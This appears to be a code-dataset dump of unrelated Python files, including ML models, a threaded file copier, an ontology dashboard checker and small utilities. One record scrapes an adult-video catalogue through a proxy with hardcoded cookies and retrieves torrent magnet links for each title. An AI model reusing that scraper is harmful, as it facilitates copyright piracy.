size='large')\nfig.text(0.585, 0.265, 'c)', size='large')\n\nplt.tight_layout()\n\n#plt.savefig('{}\\resource_variability.pdf'.format(path), bbox_inches='tight')\nplt.savefig('si/SI_windsolarvar.pdf', bbox_inches='tight')\nplt.show()","sub_path":"SEM-1.2/Making_Figures/SIFigures_May2020/si1_windsolarvar.py","file_name":"si1_windsolarvar.py","file_ext":"py","file_size_in_byte":12606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"494910708","text":"import torch.nn as nn\nimport torch.nn.functional as F\nimport torch\n\nfrom models.LSTM import LSTM\n\n\nclass TextRNN(nn.Module):\n\n def __init__(self, vocab_size, embedding_dim, output_dim, hidden_size, num_layers, bidirectional, dropout, pad_idx):\n super(TextRNN, self).__init__()\n\n self.embedding = nn.Embedding(\n vocab_size, embedding_dim, padding_idx=pad_idx)\n self.rnn = LSTM(embedding_dim, hidden_size, num_layers,bidirectional, dropout)\n\n self.fc = nn.Linear(hidden_size * 2, output_dim)\n self.dropout = nn.Dropout(dropout)\n\n\n def forward(self, x):\n text, text_lengths = x\n # text: [sent len, batch size]\n embedded = self.dropout(self.embedding(text))\n # embedded: [sent len, batch size, emb dim]\n\n hidden = self.rnn(embedded, text_lengths)\n\n hidden = self.dropout(\n torch.cat((hidden[-2, :, :], hidden[-1, :, :]), dim=1)) # 连接最后一层的双向输出\n \n return self.fc(hidden)\n","sub_path":"Medium-TextClassification/TextRNN/TextRNN.py","file_name":"TextRNN.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"653761375","text":"## test file\nimport numpy as np\nimport time\nfrom NB_NMF2 import em_full as em_full2\nfrom NB_NMF import em_full as em_full\nfrom misc import sim_nb_nmf\nnp.random.seed(123)\n\nimport pdb\n## setup\nn = 100\np = 500\nK = 3\na = 100*np.random.random(size = (p))\npt = [10*i for i in range(10)]\nprint(\"quantile for true a: \")\nprint(np.percentile(a, pt))\n\ninit_iter = 10\nmaxiter = 300\neval_every = 20\nprint(\"experiment with data: n = {}, p = {}\\n; fitted with K = {}\\n\".format(n,p,K))\nX, Lam,L_,F_ = sim_nb_nmf(n,p,K,a, seed = 123)\ntol = 1e-04\n\n## initialization\nL0,F0,a0 = em_full(X, K, 10, init = 'nndsvda', LF = None, maxiter = init_iter, verbose = True, eval_every = eval_every, random_state = 123, tol = tol)\nprint(\"a initialized to be: {}\".format(a0))\n\n## computation\nprint(\"start fitting with NBNMF_emfull\")\nstart = time.time()\nL1,F1,a1 = em_full(X, K, a0, init = None, LF = [L0,F0], maxiter = maxiter, verbose = True, eval_every = eval_every, random_state = 123, tol = tol)\nprint(\"a: {}\".format(a1))\nprint(\"EM fitted with {:.2f} seconds\\n\".format(time.time() - start))\n\n\n# print(\"start fitting with NBNMF2_emfull\")\n# a_ = np.array([a0] * p)\n# start = time.time()\n# L,F,a = em_full2(X, K, a_, init = None, LF = [L0,F0], maxiter = maxiter, verbose = True, eval_every = eval_every, random_state = 123, tol = tol)\n# print(\"EM fitted with {:.2f} seconds\\n\".format(time.time() - start))\n# print(\"quantile for fitted a: \")\n# print(np.percentile(a, pt))\n\nprint(\"start fitting with NBNMF2_emfull\")\na_ = np.array([a0] * p)\nstart = time.time()\nL3,F3,a3 = em_full2(X, K, a, init = None, LF = [L_,F_], maxiter = maxiter, verbose = True, eval_every = eval_every, random_state = 123, tol = tol)\nprint(\"EM fitted with {:.2f} seconds\\n\".format(time.time() - start))\nprint(\"quantile for fitted a: \")\nprint(np.percentile(a3, pt))\n\n\n\n# ## computation\n# print(\"start fitting with VB\")\n# a_ = a\n# prior = [1,0,1,0]\n# print(\"use a = {}\".format(a_))\n# print(\"prior:\\n\")\n# print(prior)\n# start = time.time()\n# L,F = VB(X,K,a_,prior,maxiter = 200, verbose = True, eval_every = 20)\n# #L,F = VB_test(X,K,a_,prior,maxiter = 200, verbose = True, eval_every = 20)\n# print(\"VB fitted with {:.2f} seconds\\n\".format(time.time() - start))\n\n## result for VB\n# n = 500\n# p = 1000\n# K = 3\n# Zeta : 0.055\n# ABl : 0.011\n# ABf : 0.008\n# ABu : 0.004\n# VB fitted with 15.72 seconds\n\n\n# print(L)\n# print(F)\n\n\n\n\n\n\n\n\n\n\n","sub_path":"code/test_nbnmf2.py","file_name":"test_nbnmf2.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"497819620","text":"import time\nimport os\nimport hash\nimport queue\nimport threading\nimport time\nimport datetime\nimport hashlib\nimport io\nimport psutil\nimport math\nimport configparser\nimport pymysql\nimport db\nimport accessories\nimport shutil\nimport sys\n\nlock = threading.Lock()\nobj_Disk = psutil.disk_usage('/')\nDiskPercentUsed = (obj_Disk.percent)\nFreeSpace = (obj_Disk.free)\nFileCount = 0\ntotal_size = 0\nPercentageProgress = 0\nCameraModel = \"\"\nsource = \"/mnt/source/From i2S/\"\ntarget = \"/mnt/target/\"\nFileHash = \"\"\nFilesCount = 0\nFilesCount = 0\nbegin = time.time()\n\nprint(FreeSpace/1024)\n\ndef processfile(pathfile):\n global total_size\n global FileCount\n global target\n global FilesCount\n global log\n log = open(\"output.log\",\"a\")\n if accessories.IsIgnoredFile(pathfile):\n return\n file = accessories.File(pathfile)\n FileCount += 1\n #print(file.HashTime)\n if not file.AllreadyInDB():\n CreationDate = file.creationDate\n if file.Make == \"Other\" and file.Model == \"Other\":\n Camera = \"Other\"\n elif file.Make == \"Other\" and file.Model != \"Other\":\n Camera = file.Model\n elif file.Make != \"Other\" and file.Model == \"Other\":\n Camera = file.Make\n elif str(file.Make) in str(file.Model):\n Camera = file.Model\n else:\n Camera = str(file.Make) + \" \" + str(file.Model)\n FileDestination = os.path.join(target, CreationDate[0], CreationDate[1], CreationDate[2], Camera)\n if accessories.CreateDestionation(FileDestination):\n success, error, time = file.CopyTo(FileDestination) \n if not success:\n print(\"%s : %s\" % (error, file.Filename))\n log.write(\"%s : %s\" % (error, file.Filename))\n file.WriteErrorToDB(\"%s : %s\" % (error, file.Filename))\n else:\n print(\"%s/%s, %s, %s, %s, %s, %s, %s\" % (FileCount, FilesCount, file.Filename, file.Make, file.Model, round(file.Size/1024/1024,2), round(file.HashTime,2),round((file.Size/1024/1024)/time,2)))\n log.write(\"%s/%s, %s, %s, %s, %s, %s, %s\\n\" % (FileCount, FilesCount, file.Filename, file.Make, file.Model, round(file.Size/1024/1024,2), round(file.HashTime,2),round((file.Size/1024/1024)/time,2)))\n file.WriteFiletoDB()\n else:\n print(\"Could not create destination %s\" % (FileDestination))\n log.write(\"Could not create destination %s\\n\" % (FileDestination))\n file.WriteErrorToDB(\"Could not create destination %s\\n\" % (FileDestination))\n else:\n print(\"Allready in database %s\" % str(file.Filename))\n log.write(\"Allready in database %s\\n\" % str(file.Filename))\n file.WriteErrorToDB(\"Allready in database %s\" % str(file.Filename))\n\n# Define a worker function\ndef worker(file_queue):\n queue_full = True\n while queue_full:\n try:\n # Get your data off the queue, and do some work\n file = file_queue.get(False)\n processfile(file)\n file_queue.task_done()\n except queue.Empty:\n queue_full = False\n\n\n# Load up a queue with your data. This will handle locking\nq = queue.Queue()\nprint(\"Scanning files...\")\nfor path,dirs,files in os.walk(source):\n for filename in files:\n if filename[0] != \".\":\n FilesCount = FilesCount + 1\n file = os.path.join(path,filename)\n q.put(file)\nprint(\"Finished scanning...\")\nthread_count = 8\nfor i in range(thread_count):\n t = threading.Thread(target=worker, args = (q,))\n t.start()\nq.join()\nfinished = time.time() - begin\nprint(\"Total time : %s\" % round(finished,2))\nlog.write(\"Total time : %s\" % round(finished,2))","sub_path":"Threadtest.2.py","file_name":"Threadtest.2.py","file_ext":"py","file_size_in_byte":3700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"437556980","text":"def GetAVcode():\n '''\n 从URL中获得每一页的AV code\n '''\n codelist = []\n starturl = 'http://www.javlibrary.com/cn/vl_bestrated.php'\n urls = GUrl(starturl)\n for url in urls:\n proxies = {\n 'http': '127.0.0.1:1087',\n 'https': '127.0.0.1:1087'\n }\n cookie = '__cfduid=d6584d181c0072c52af034f471e4910441513402641; timezone=-480; __utma=45030847.784005738.1513402642.1513402642.1513402642.1; __utmz=45030847.1513402642.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); sc_is_visitor_unique=rx8499656.1513402643.8C5475D9B4614FA64DC9DF6890F377AA.1.1.1.1.1.1.1.1.1; __qca=P0-1312521764-1513402642581; __utma=45030847.784005738.1513402642.1513402642.1513402642.1; __utmz=45030847.1513402642.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); __atuvc=3%7C50; __atuvs=5a34e264283c7914000; over18=18'\n cookies = DealCookies(cookie)\n r = requests.get(url, proxies=proxies, cookies=cookies)\n content= r.text\n soup = BeautifulSoup(content, 'html.parser', from_encoding='utf-8')\n # 找class为id的div\n codes = soup.find_all('div', 'id')\n for code in codes:\n codelist.append(code.text)\n print('Get====='+code.text)\n return codelist\n\ndef useweb1(code):\n '''\n 使用https://idope.se/torrent-list/获取对于番号的磁力链\n :param code:\n :return:\n '''\n url_root1 = 'https://idope.se'\n search_url1 = 'https://idope.se/torrent-list/'\n headers ={'user-agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'}\n r1 = requests.get(search_url1+code,headers=headers)\n content1 = r1.text\n soup1 = BeautifulSoup(content1, 'html.parser')\n url_1 = soup1.find('a',href=re.compile(code))['href']\n r2 = requests.get(url_root1+url_1)\n content2 = r2.text\n soup2 = BeautifulSoup(content2, 'html.parser')\n magnet = soup2.find('div', id='deteails')\n if magnet:\n return(magnet.text)\n return ''\n \n \nif __name__ == '__main__':\n codelist = GetAVcode()\n cpus = multiprocessing.cpu_count()\n p = Pool(cpus)\n for code in codelist:\n p.apply_async(GetAVmagnet, args=(code,))\n p.close()\n p.join()\n","sub_path":"javli.py","file_name":"javli.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"394555644","text":"import requests\nimport base64\nimport os\nimport json\nimport logging\n\nimport selenium\nfrom fetch_thread import get_api, get_tweet, update_urls\nfrom screenshot_selenium import save_screenshot\n\nlogging.basicConfig(\n format='%(asctime)s %(module)s.%(funcName)s:%(levelname)s:%(message)s',\n datefmt='%m/%d/%Y %I_%M_%S %p',\n filename='log_file',\n level=logging.INFO\n)\n\ndef delete_images(photo_list):\n for photo in photo_list:\n try:\n os.remove(photo)\n except OSError:\n pass\n\ndef save_images(url):\n api = get_api()\n tweet = get_tweet(url)\n urls = [url]\n urls.extend(update_urls(tweet, api))\n logging.info('screenshot/save_images: URLs fetched')\n for url in urls:\n logging.info('screenshot/save_images: ' + url)\n \n count = 0\n for url in urls:\n save_image(url, \"desktop\", tweet.user.screen_name + \"_\" + str(count))\n count += 1\n base_str = os.path.join(os.getcwd(), 'images')\n return [os.path.join(base_str, tweet.user.screen_name + \"_\" + str(_count) + \".png\") for _count in range(count)]\n\ndef save_image(url, mode, name):\n save_screenshot(url, name)","sub_path":"src/screenshot.py","file_name":"screenshot.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"441227160","text":"'''\r\nCreated on Mar 28, 2015\r\n\r\n@author: Brandon\r\n'''\r\nfrom django.conf.urls import patterns, url\r\nfrom member import views\r\n\r\nurlpatterns = patterns('',\r\n url(r'^$', views.memberIndex, name='memberIndex'),\r\n url(r'^(?P\\d+)/$', views.memberDetails, name='memberDetails'),\r\n url(r'^uploadFailure/$', views.uploadFailure, name='uploadFailure'),\r\n )","sub_path":"DjangoTest_1/member/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"238221850","text":"#!/usr/bin/env python3\n\nimport datetime\nimport gc\nimport json\nimport os\nimport py4j\nimport sys\nimport yaml\n\nimport dash_utils\nimport fp_001\nimport fp_002\nimport fp_003\nimport fp_004\nimport fp_005\nimport fp_006\nimport fp_007\nimport fp_008\nimport fp_009\nimport fp_011\nimport fp_012\nimport fp_016\nimport report_utils\n\nfrom argparse import ArgumentParser, FileType\nfrom io import TextIOWrapper\nfrom py4j.java_gateway import JavaGateway\n\n\ndef run():\n # ---------------------------- #\n # PREPARE INPUT\n # ---------------------------- #\n\n # parse input args\n parser = ArgumentParser(description='Create dashboard files')\n parser.add_argument('ontology', type=str, help='Input ontology file')\n parser.add_argument('registry', type=FileType('r'), help='Registry YAML file')\n parser.add_argument('license', type=FileType('r'), help='License JSON schema')\n parser.add_argument('contact', type=FileType('r'), help='Contact JSON schema')\n parser.add_argument('relations', type=FileType('r'), help='Table containing RO IRIs and labels')\n parser.add_argument('outdir', type=str, help='Output directory')\n args = parser.parse_args()\n\n owl = os.path.basename(args.ontology)\n namespace = os.path.splitext(owl)[0]\n\n ontology_file = args.ontology\n registry = args.registry\n license_schema = json.load(args.license)\n contact_schema = json.load(args.contact)\n ro_file = args.relations\n\n # Create the build directory for this ontology\n ontology_dir = args.outdir\n os.makedirs(ontology_dir, exist_ok=True)\n\n # Launch the JVM using the robot JAR\n py4j.java_gateway.launch_gateway(\n jarpath='build/robot.jar', classpath='org.obolibrary.robot.PythonOperation', die_on_exit=True, port=25333)\n\n # Activate gateway to JVM\n gateway = JavaGateway()\n robot_gateway = gateway.jvm.org.obolibrary.robot\n\n # IOHelper for working with ontologies\n io_helper = robot_gateway.IOHelper()\n\n # Handle ontology file\n big = namespace in BIG_ONTS\n if not big:\n # Load ontology as OWLOntology object\n if not ontology_file:\n ont_or_file = None\n try:\n ont_or_file = io_helper.loadOntology(ontology_file)\n except Exception:\n print('ERROR: Unable to load \\'{0}\\''.format(ontology_fil), flush=True)\n ont_or_file = None\n # Get the Verison IRI\n version_iri = dash_utils.get_version_iri(ont_or_file)\n else:\n # Just provide path to file\n ont_or_file = ontology_file\n # Get the version IRI by text parsing\n version_iri = dash_utils.get_big_version_iri(ont_or_file)\n\n # Get the registry data\n yaml_data = yaml.load(registry, Loader=yaml.SafeLoader)\n yaml_data = yaml_data['ontologies']\n data = dash_utils.get_data(namespace, yaml_data)\n\n # Map of all ontologies to their domains\n domain_map = dash_utils.get_domains(yaml_data)\n # Map of RO labels to RO IRIs\n ro_props = fp_007.get_ro_properties(ro_file)\n\n if 'is_obsolete' in data and data['is_obsolete'] is 'true':\n # do not run on obsolete ontologies\n print('{0} is obsolete and will not be checked...'.format(namespace), flush=True)\n sys.exit(0)\n\n # ---------------------------- #\n # RUN CHECKS\n # ---------------------------- #\n\n print('-----------------\\nChecking ' + namespace, flush=True)\n\n # Get the report based on if it's big or not\n report = None\n good_format = None\n if big:\n if namespace != 'gaz':\n # Report currently takes TOO LONG for GAZ\n print('Running ROBOT report on {0}...'.format(namespace), flush=True)\n report_obj = report_utils.BigReport(robot_gateway, namespace, ont_or_file)\n report = report_obj.get_report()\n good_format = report_obj.get_good_format()\n else:\n if ont_or_file:\n # Ontology is not None\n print('Running ROBOT report on {0}...'.format(namespace), flush=True)\n report = report_utils.run_report(robot_gateway, io_helper, ont_or_file)\n\n # Execute the numbered checks\n check_map = {}\n try:\n if big:\n check_map[1] = fp_001.big_is_open(ont_or_file, data, license_schema)\n else:\n check_map[1] = fp_001.is_open(ont_or_file, data, license_schema)\n except Exception as e:\n check_map[1] = 'INFO|unable to run check 1'\n print('ERROR: unable to run check 1 for {0}\\nCAUSE:\\n{1}'.format(namespace, str(e)), flush=True)\n\n try:\n if big:\n check_map[2] = fp_002.big_is_common_format(good_format)\n else:\n check_map[2] = fp_002.is_common_format(ont_or_file)\n except Exception as e:\n check_map[2] = 'INFO|unable to run check 2'\n print('ERROR: unable to run check 2 for {0}\\nCAUSE:\\n{1}'.format(namespace, str(e)), flush=True)\n\n try:\n if big:\n check_map[3] = fp_003.big_has_valid_uris(namespace, ont_or_file, ontology_dir)\n else:\n check_map[3] = fp_003.has_valid_uris(robot_gateway, namespace, ont_or_file, ontology_dir)\n except Exception as e:\n check_map[3] = 'INFO|unable to run check 3'\n print('ERROR: unable to run check 3 for {0}\\nCAUSE:\\n{1}'.format(namespace, str(e)), flush=True)\n\n try:\n if big:\n check_map[4] = fp_004.big_has_versioning(ont_or_file)\n else:\n check_map[4] = fp_004.has_versioning(ont_or_file)\n except Exception as e:\n check_map[4] = 'INFO|unable to run check 4'\n print('ERROR: unable to run check 4 for {0}\\nCAUSE:\\n{1}'.format(namespace, str(e)), flush=True)\n\n try:\n check_map[5] = fp_005.has_scope(data, domain_map)\n except Exception as e:\n check_map[5] = 'INFO|unable to run check 5'\n print('ERROR: unable to run check 5 for {0}\\nCAUSE:\\n{1}'.format(namespace, str(e)), flush=True)\n\n try:\n check_map[6] = fp_006.has_valid_definitions(report)\n except Exception as e:\n check_map[6] = 'INFO|unable to run check 6'\n print('ERROR: unable to run check 6 for {0}\\nCAUSE:\\n{1}'.format(namespace, str(e)), flush=True)\n\n try:\n if big:\n check_map[7] = fp_007.big_has_valid_relations(namespace, ont_or_file, ro_props, ontology_dir)\n else:\n check_map[7] = fp_007.has_valid_relations(namespace, ont_or_file, ro_props, ontology_dir)\n except Exception as e:\n check_map[7] = 'INFO|unable to run check 7'\n print('ERROR: unable to run check 7 for {0}\\nCAUSE:\\n{1}'.format(namespace, str(e)), flush=True)\n\n try:\n check_map[8] = fp_008.has_documentation(data)\n except Exception as e:\n check_map[8] = 'INFO|unable to run check 8'\n print('ERROR: unable to run check 8 for {0}\\nCAUSE:\\n{1}'.format(namespace, str(e)), flush=True)\n\n try:\n check_map[9] = fp_009.has_users(data)\n except Exception as e:\n check_map[9] = 'INFO|unable to run check 9'\n print('ERROR: unable to run check 9 for {0}\\nCAUSE:\\n{1}'.format(namespace, str(e)), flush=True)\n\n try:\n check_map[11] = fp_011.has_contact(data, contact_schema)\n except Exception as e:\n check_map[11] = 'INFO|unable to run check 11'\n print('ERROR: unable to run check 11 for {0}\\nCAUSE:\\n{1}'.format(namespace, str(e)), flush=True)\n\n try:\n check_map[12] = fp_012.has_valid_labels(report)\n except Exception as e:\n check_map[12] = 'INFO|unable to run check 12'\n print('ERROR: unable to run check 12 for {0}\\nCAUSE:\\n{1}'.format(namespace, str(e)), flush=True)\n\n try:\n if big:\n check_map[16] = fp_016.big_is_maintained(ont_or_file)\n else:\n check_map[16] = fp_016.is_maintained(ont_or_file)\n except Exception as e:\n check_map[16] = 'INFO|unable to run check 16'\n print('ERROR: unable to run check 16 for {0}\\nCAUSE:\\n{1}'.format(namespace, str(e)), flush=True)\n\n # finally, add the report results to the dashboard and save the report\n try:\n check_map['report'] = report_utils.process_report(robot_gateway, report, ontology_dir)\n except Exception as e:\n check_map['report'] = 'INFO|unable to save report'\n print('ERROR: unable to save ROBOT report for {0}\\nCAUSE:\\n{1}'.format(namespace, str(e)), flush=True)\n\n # ---------------------------- #\n # SAVE RESULTS\n # ---------------------------- #\n\n # Parse results\n err = 0\n warn = 0\n info = 0\n all_checks = {}\n\n for check, result in check_map.items():\n if result is None or 'status' not in result:\n print('Missing result for check {0}'.format(check), flush=True)\n continue\n\n status = result['status']\n\n if status == 'ERROR':\n err += 1\n elif status == 'WARN':\n warn += 1\n elif status == 'INFO':\n info += 1\n elif status != 'PASS':\n print('Unknown status \"{0}\" for check {1}'.format(status, check), flush=True)\n continue\n\n key = check\n if check in PRINCIPLE_MAP:\n key = PRINCIPLE_MAP[check]\n elif check == 'report':\n key = 'ROBOT Report'\n\n all_checks[key] = result\n\n # Summary status\n if err > 0:\n summary = 'ERROR'\n summary_comment = '{0} errors'.format(err)\n elif warn > 0:\n summary = 'WARN'\n summary_comment = '{0} warnings'.format(warn)\n elif info > 0:\n summary = 'INFO'\n summary_comment = '{0} info messages'.format(info)\n else:\n summary = 'PASS'\n summary_comment = ''\n\n date = datetime.datetime.today()\n save_data = {'namespace': namespace, 'version': version_iri, 'date': date.strftime('%Y-%m-%d'),\n 'summary': {'status': summary, 'comment': summary_comment}, 'results': all_checks}\n\n # Save to YAML file\n outfile = os.path.join(ontology_dir, 'dashboard.yml')\n print('Saving results to {0}'.format(outfile))\n with open(outfile, 'w+') as f:\n yaml.dump(save_data, f)\n\n sys.exit(0)\n\n\nBIG_ONTS = ['bto', 'chebi', 'dron', 'gaz', 'ncbitaxon', 'ncit', 'pr', 'uberon']\nOBO = 'http://purl.obolibrary.org/obo'\n\nPRINCIPLE_MAP = {\n 1: 'FP1 Open',\n 2: 'FP2 Common Format',\n 3: 'FP3 URIs',\n 4: 'FP4 Versioning',\n 5: 'FP5 Scope',\n 6: 'FP6 Textual Definitions',\n 7: 'FP7 Relations',\n 8: 'FP8 Documented',\n 9: 'FP9 Plurality of Users',\n 11: 'FP11 Locus of Authority',\n 12: 'FP12 Naming Conventions',\n 16: 'FP16 Maintenance'\n}\n\n\nif __name__ == '__main__':\n run()\n","sub_path":"util/dashboard/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":10530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"365393626","text":"import math\n\ndef pascals_triangle(size):\n triangle = []\n i = 0\n while i <= size:\n line = []\n k = 0\n while k <= i:\n line.append(math.factorial(i) / (math.factorial(k) * math.factorial(i-k)))\n k += 1\n triangle.append(line)\n i += 1\n return triangle\n\ndef get_triangle(size):\n triangle = pascals_triangle(size)\n for i in triangle:\n print(i, \" \")\n return\n\ndef main():\n for i in range(15):\n get_triangle(i)\nmain()\n","sub_path":"pascals_triangle.py","file_name":"pascals_triangle.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"120787367","text":"import sys\nimport time\n\nfrom PyQt5 import QtWidgets, QtGui, QtCore\n\nfrom green_ball_tracker import General_control,Region_number\nball_number = 0\ncoordinates = \"\"\ncentroid_text = \"\"\nball_list = \"\"\nt = General_control()\ndef Window():\n global ball_number\n global coordinates\n global centroid_text\n global ball_list\n global t\n\n app = QtWidgets.QApplication(sys.argv)\n v_box = QtWidgets.QVBoxLayout()\n label1 = QtWidgets.QLabel(\"Python green ball tracking app with opencv\")\n v_box.addWidget(label1,alignment=QtCore.Qt.AlignCenter)\n label2 = QtWidgets.QLabel()\n pixmap = QtGui.QPixmap(\"balls.jpeg\")\n pixmap_resized = pixmap.scaled(480, 360, QtCore.Qt.KeepAspectRatio)\n label2.setPixmap(pixmap_resized)\n v_box.addWidget(label2,alignment=QtCore.Qt.AlignCenter)\n\n # Select Class\n label0 = QtWidgets.QLabel(\"Select Class\")\n Region_button = QtWidgets.QRadioButton(\"Regionn Number\")\n General_button = QtWidgets.QRadioButton(\"General Control\")\n radio_button = QtWidgets.QPushButton(\"Select\")\n def click0():\n global t\n if(Region_button.isChecked()):\n t = Region_number()\n if(General_button.isChecked()):\n t = General_control()\n t.close()\n\n radio_button.clicked.connect(click0)\n\n v_box0 = QtWidgets.QVBoxLayout()\n v_box0.addWidget(label0)\n v_box0.addWidget(Region_button)\n v_box0.addWidget(General_button)\n v_box0.addWidget(radio_button)\n v_box.addLayout(v_box0)\n\n\n\n # Webcam start\n button1 = QtWidgets.QPushButton(\"Start green ball tracking (press q for stop) \")\n def click1():\n global t\n t.track_balls()\n button1.clicked.connect(click1)\n v_box.addWidget(button1)\n\n\n # Find total green ball numbers\n\n button2 = QtWidgets.QPushButton(\"Get number of all balls\")\n label3 = QtWidgets.QLabel(\"Total green ball number is:\" + str(ball_number))\n def click2():\n global t\n global ball_number\n ball_number = t.get_balls_number()\n label3.setText(\"Total green ball number is:\" + str(ball_number))\n\n button2.clicked.connect(click2)\n\n h_box = QtWidgets.QHBoxLayout()\n h_box.addWidget(button2)\n h_box.addWidget(label3)\n v_box.addLayout(h_box)\n\n # Ball coordinates\n\n label4 = QtWidgets.QLabel(str(coordinates))\n def click3():\n global t\n global coordinates\n coordinates = t.get_ball_coordinates()\n label4.setText(str(coordinates))\n\n button3 = QtWidgets.QPushButton(\"Find all coordinates\")\n\n button3.clicked.connect(click3)\n h_box2 = QtWidgets.QHBoxLayout()\n h_box2.addWidget(button3)\n h_box2.addWidget(label4)\n v_box.addLayout(h_box2)\n # centroid\n label5 = QtWidgets.QLabel(str(centroid_text))\n def click4():\n global t\n global centroid_text\n centroid_text = t.centroid()\n label5.setText(str(centroid_text))\n button4 = QtWidgets.QPushButton(\"Centroid\")\n button4.clicked.connect(click4)\n h_box3 = QtWidgets.QHBoxLayout()\n h_box3.addWidget(button4)\n h_box3.addWidget(label5)\n v_box.addLayout(h_box3)\n\n # ball list\n\n label6 = QtWidgets.QLabel(str(ball_list))\n\n def click5():\n global t\n global ball_list\n ball_list = \"\"\n\n for i in t.get_ball_list():\n ball_list +=str(i)\n label6.setText(str(ball_list))\n\n button5 = QtWidgets.QPushButton(\"Ball List\")\n button5.clicked.connect(click5)\n h_box4 = QtWidgets.QHBoxLayout()\n h_box4.addWidget(button5)\n h_box4.addWidget(label6)\n v_box.addLayout(h_box4)\n\n v_box.addStretch()\n window = QtWidgets.QWidget()\n window.setWindowTitle(\"Green Ball Tracking\")\n window.setLayout(v_box)\n\n window.setGeometry(100,100,640,480)\n window.show()\n time.sleep(1)\n sys.exit(app.exec())\n\n\n\n\ndef main():\n Window()\n\nif __name__ == '__main__':\n main()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"574024923","text":"#! /usr/bin/python3.7\nwhile True:\n\tdef DSTFC():\n\t\tkeywordsDist = ['d', 'dis', 'dist', 'distance']\n\t\tkeywordsTime = ['t', 'tim', 'time', 'ti']\n\t\tkeywordsSpeed = ['s', 'sp', 'spe', 'spee', 'speed']\n\t\tprint(\"Welcome to the distance speed time calculator\")\n\t\tsolveFor = input(\"What are we solvig for? (distance(d), speed(s) or time(t): \").lower()\n\t\tif solveFor in keywordsDist:\n\t\t\ts = float(input(\"What is speed in meters/seconds?: \"))\n\t\t\tt = float(input(\"What is the amount of time in seconds?: \"))\n\t\t\tdist = s * t\n\t\t\tprint(\"{} meters\".format(dist))\n\t\telif solveFor in keywordsTime:\n\t\t\td = float(input(\"What is the distance in meters?: \"))\n\t\t\ts = float(input(\"What is the speed in meters/seconds\"))\n\t\t\ttime = d / s\n\t\t\tprint(\"{} seconds\".format(time))\n\t\telif solveFor in keywordsSpeed:\n\t\t\td = float(input(\"What is the distance in meters?: \"))\n\t\t\tt = float(input(\"What is the time in seconds\"))\n\t\t\tspeed = d / t\n\t\t\tprint(\"{} m/s\".format(speed))\n\tDSTFC()\nDSTFC()","sub_path":"phys/distspeed.py","file_name":"distspeed.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"509826456","text":"\"\"\"\nThe field module provides information about the field\nin BundleType.\n\nFields are allowed to be flipped, indicating that it's\nopposite direction to the BundleType.\n\nEach field includes\n name: individual name of the field;\n type: defined type;\n orientation: flipped or not.\n\"\"\"\nfrom .utils import serialize_str\n\n\nclass Field(object):\n def __init__(self, name, tpe, is_flipped=False):\n self.name = name\n self.tpe = tpe\n self.is_flipped = is_flipped\n\n def serialize(self, output):\n if self.is_flipped:\n output.write(b\"flip \")\n output.write(serialize_str(self.name))\n output.write(b\" : \")\n self.tpe.serialize(output)\n\n def field_eq(self, other):\n if type(other) != type(self):\n return False\n if self.name != other.name:\n return False\n if self.is_flipped != other.is_flipped:\n return False\n return self.tpe.type_eq(other.tpe)\n","sub_path":"py_hcl/firrtl_ir/field.py","file_name":"field.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"454401509","text":"# -*- coding: utf-8 -*-\n#!/usr/bin/env python3\nimport csv\n\nclass Ontology(object):\n \"\"\"docstring for Ontology.\"\"\"\n def __init__(self):\n super(Ontology, self).__init__()\n #self.arg = arg\n\n def write_owl(self):\n self.write_city_data()\n #self.write_poi_data()\n\n def write_city_data(self):\n rows = []\n with open('city_data.csv', newline='') as csvfile:\n reader = csv.reader(csvfile, delimiter=',', quotechar='\"')\n for r in reader:\n rows.append(r)\n\n with open('smart_city_ontology.owl','r', newline='') as original_file:\n with open('smart_city.owl','w') as file:\n for line in original_file:\n if 'Declaration(ObjectProperty(' in line:\n file.write('writing object property declaration\\n')\n file.write(line)\n else:\n file.write(line)\n\n\n def write_poi_data(self):\n with open('foursquare_data.csv', newline='') as csvfile:\n reader = csv.reader(csvfile, delimiter=',', quotechar='\"')\n for row in reader:\n print(row)\n","sub_path":"ontology.py","file_name":"ontology.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"401552980","text":"#! /usr/bin/env python\n\n# Copyright (c) 2008, PediaPress GmbH\n# See README.txt for additional licensing information.\n\nimport os\nimport shutil\nimport tempfile\nfrom zipfile import ZipFile\nimport urlparse\ntry:\n import json\nexcept ImportError:\n import simplejson as json\n\nfrom mwlib import wikidbbase, namespace\n\nclass Wiki(wikidbbase.WikiDBBase):\n def __init__(self, zipfile):\n \"\"\"\n @type zipfile: basestring or 